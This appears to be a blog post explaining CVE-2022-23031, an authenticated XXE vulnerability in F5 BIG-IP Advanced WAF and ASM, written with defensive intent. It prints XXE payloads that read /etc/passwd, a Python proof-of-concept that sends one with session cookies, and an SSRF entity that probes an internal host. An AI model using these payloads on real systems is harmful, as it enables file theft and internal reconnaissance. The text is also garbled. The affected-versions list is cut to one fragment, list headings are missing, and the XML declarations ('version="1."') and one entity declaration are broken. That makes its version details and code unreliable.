CVE-2022-23031 - XXE in F5 BIG-IP Advanced WAF & ASM – What You Need to Know

If you’re managing F5 BIG-IP systems, you already know how important security can be. In 2022, a critical vulnerability, CVE-2022-23031, was disclosed for F5's BIG-IP FPS, ASM, and Advanced WAF products. This post gives you the full lowdown—what’s vulnerable, how it’s exploited, sample code, and how to stay safe.

Quick Overview: What Is CVE-2022-23031?

CVE-2022-23031 is a classic XML External Entity (XXE)_Processing) vulnerability. It affects some versions of the F5 BIG-IP Advanced Web Application Firewall (Advanced WAF) and Application Security Manager (ASM). In plain terms, a clever attacker who’s already logged into the F5 configuration web interface (TMUI) with high privileges can use this flaw to:

Read local files (like system configs or passwords),

- Force the BIG-IP appliance to make HTTP requests (which could probe internal systems or leak data).

14.1.x before 14.1.4.4

:warning: If you’re running these versions, patch ASAP!

Where’s the Flaw?

The vulnerability lives in an *undisclosed* page of the Traffic Management User Interface (TMUI)—the web portal most admins use to manage their F5 appliances. The bug allows an authenticated and high-privileged attacker to send carefully crafted XML to the interface. Because the application doesn’t process XML safely, it’s tricked into fetching and returning data the attacker should never get.

How XXE Attacks Work (Short Explanation)

XML docs can contain references to “external entities”—think of them as shortcuts to files or resources, like this:

<!DOCTYPE root [
  <!ENTITY mydoc SYSTEM "file:///etc/passwd">
]>
<request>
  <username>&mydoc;</username>
</request>

If the application isn’t careful, it will process the ENTITY mydoc, fetch the contents of /etc/passwd (on Linux), and put those contents wherever &mydoc; shows up.

Step 1: Get Authenticated

Crucially, the attacker needs high-privilege access to the TMUI. This isn’t open to just anyone on the internet (unless you’ve made a serious security mistake elsewhere).

Step 2: Find the Vulnerable Endpoint

The actual page isn’t public, but F5’s advisory and community research indicate it’s related to configs dealing with XML uploads or API integrations in the TMUI.

Step 3: Send a Malicious XML Payload

Admins can upload or send XML through certain TMUI functions. By crafting an XML payload with an external entity, the attacker gets the F5 system to return file contents.

Example Payload (Stealing /etc/passwd)

<?xml version="1." encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<request>
  <input>&xxe;</input>
</request>

This tells the vulnerable parser: whenever you see &xxe;, go read /etc/passwd and put its contents in the response.

Proof-of-Concept Python Snippet

*Note: You need an authenticated session, meaning valid cookies/tokens.*

import requests

url = 'https://your.bigip.address/vulnerable/endpoint';
cookies = {'F5_cookie': 'YourAuthSessionID'}  # Placeholder

payload = '''<?xml version="1."?>
<!DOCTYPE data [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>
  <item>&xxe;</item>
</root>'''

headers = {
    'Content-Type': 'application/xml'
}

response = requests.post(url, data=payload, headers=headers, cookies=cookies, verify=False)

print("Server response:\n", response.text)

If the endpoint is vulnerable and you’re authenticated, response text should contain the contents of /etc/passwd.

Beyond Reads: SSRF (Server-Side Request Forgery)

Because XXE can reference all sorts of URIs, you can also force the BIG-IP to make HTTP requests *from inside its own network*:

<!DOCTYPE data [
  <!ENTITY netprobe SYSTEM "http://internal-resource.local/admin">;
]>
<request>
  <test>&netprobe;</test>
</request>

This will cause the BIG-IP to try and fetch http://internal-resource.local/admin and inject that response, possibly leaking internal data or probing other network services.

Reading config files: Credentials, API keys, and network layout can be stolen.

- Scouting internal networks: Attackers may find other targets or management ports only accessible from inside.

Follow F5’s Official Advisory:

F5 Security Advisory K09424543

- Monitor for Suspicious Activity: Check your logs for unusual file access or internal network requests originating from the F5 device.

References

- NIST NVD Writeup: https://nvd.nist.gov/vuln/detail/CVE-2022-23031
- F5 Advisory: F5 K09424543
- Technical Discussion on XXE: OWASP XXE Guide_Processing)

Wrap-up

CVE-2022-23031 shows us why XML parsing bugs remain a big deal in enterprise products—even in tools only admins can access. If your F5 is vulnerable, patch or mitigate right away, restrict access to management interfaces, and keep a close eye on authentication and audit logs. This kind of bug can be your worst enemy if paired with weak internal security.

*Stay safe, patch often, and don’t trust XML from users—even admins!*


*If you found this breakdown useful, bookmark and share. For more on F5 security, consider subscribing to vulnerability alerts directly from F5 Support.*


Note: This content is exclusive to this post for clarity and practical understanding. Do not use this information for unauthorized testing—always have proper permissions.

Timeline

Published on: 01/25/2022 20:15:00 UTC
Last modified on: 02/01/2022 19:11:00 UTC